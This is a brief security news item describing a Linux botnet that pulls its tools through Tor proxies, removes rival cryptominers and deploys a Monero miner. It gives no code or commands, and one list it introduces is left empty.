A recently discovered malware botnet is targeting Linux systems by employing emerging techniques such as using Tor proxies, the deactivation or removal of competing malware, and abusing legitimate DevOps tools.
On analysis, it is found that this Linux botnet downloads its needed files from the Tor network, including essential binaries such as ps, as, ss, and curl. Using shell script and Unix system design, the malware is able to perform HTTP requests to get more information on the infected systems.
To commit the attacks, a large network of proxies is maintained by threat actors to establish and maintain connections between the surface web and the Tor network. The proxies also send various identifiable information about the target systems, including:
The botnet is currently being used for cryptocurrency mining as the XMRing Monero (XMR) miner is deployed onto the infected machines. The malware searches the system for running miners, uses its own mining tools, and attempts to remove the other miners. The malware only requires the Linux operating system to run and spread.